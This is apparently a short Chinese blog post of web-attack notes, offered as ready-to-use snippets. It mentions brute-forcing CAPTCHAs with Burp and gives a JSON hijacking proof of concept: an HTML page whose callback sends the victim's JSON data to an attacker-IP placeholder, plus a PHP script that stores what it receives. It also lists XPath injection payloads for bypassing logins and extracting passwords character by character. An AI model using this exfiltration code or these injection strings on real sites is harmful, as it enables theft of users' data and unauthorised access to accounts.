验证码

  • 使用burp进行验证码枚举

JSON劫持

<!DOCTYPE html>
<html>
    <head>
        <meata charset='UTF-8'></meata>
        <title>劫持</title>
        <script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>
        <script>
            function test(data){
                var xmlhttp = new XMLHttpRequest();
                var url = "http://攻击者IP地址/json.php?file=" + JSON.stringify(data);
                xmlhttp.open("GET", url, true);
                xmlhttp.send();
            }
        </script>
    </head>
    <body>
        
    </body>
</html>
// json.php
<?php
    if($_GET['file']){
        file_put_contents('json.txt', $_GET['file']);
    }    
?>

Xpath注入

  1. ​ 注入方法

    1. username=admin' or '1'='1(万能密码)
    2. username=admin' and string-length(@password)=6 or '1'='1&password=0&submit=submit(获取字符长度)
    3. username=admin' and substring(@password,1,1)='a' or '1'='1&password=0&submit=submit(截取字符)
最后修改:2024 年 10 月 09 日
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏